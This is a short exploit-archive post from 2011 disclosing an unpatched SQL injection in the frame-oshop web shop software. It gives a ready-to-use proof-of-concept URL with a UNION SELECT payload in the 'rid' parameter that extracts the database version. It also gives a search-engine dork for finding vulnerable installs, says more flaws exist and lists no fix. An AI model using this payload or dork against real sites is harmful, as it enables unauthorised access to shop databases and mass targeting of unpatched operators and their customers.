frame-oshop SQL Injection Vulnerability

2011-05-15 22:15:03

product: frame-oshop
vendor: http://www.sdaxx.de/
date: 15.05.2011
status: 0day
version: i dunno...

PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12

Dork: "2006 by Sdaxx Rostock" intitle:"frame-oshop"

Note: -sessid had to be fresh
-there are more vuln...

>>published by -SmoG- on SceneGround.info<<


gretz to my mentor Therion, c0x and other sg-members!

Fixes

No fixes

In order to submit a new fix you need to be registered.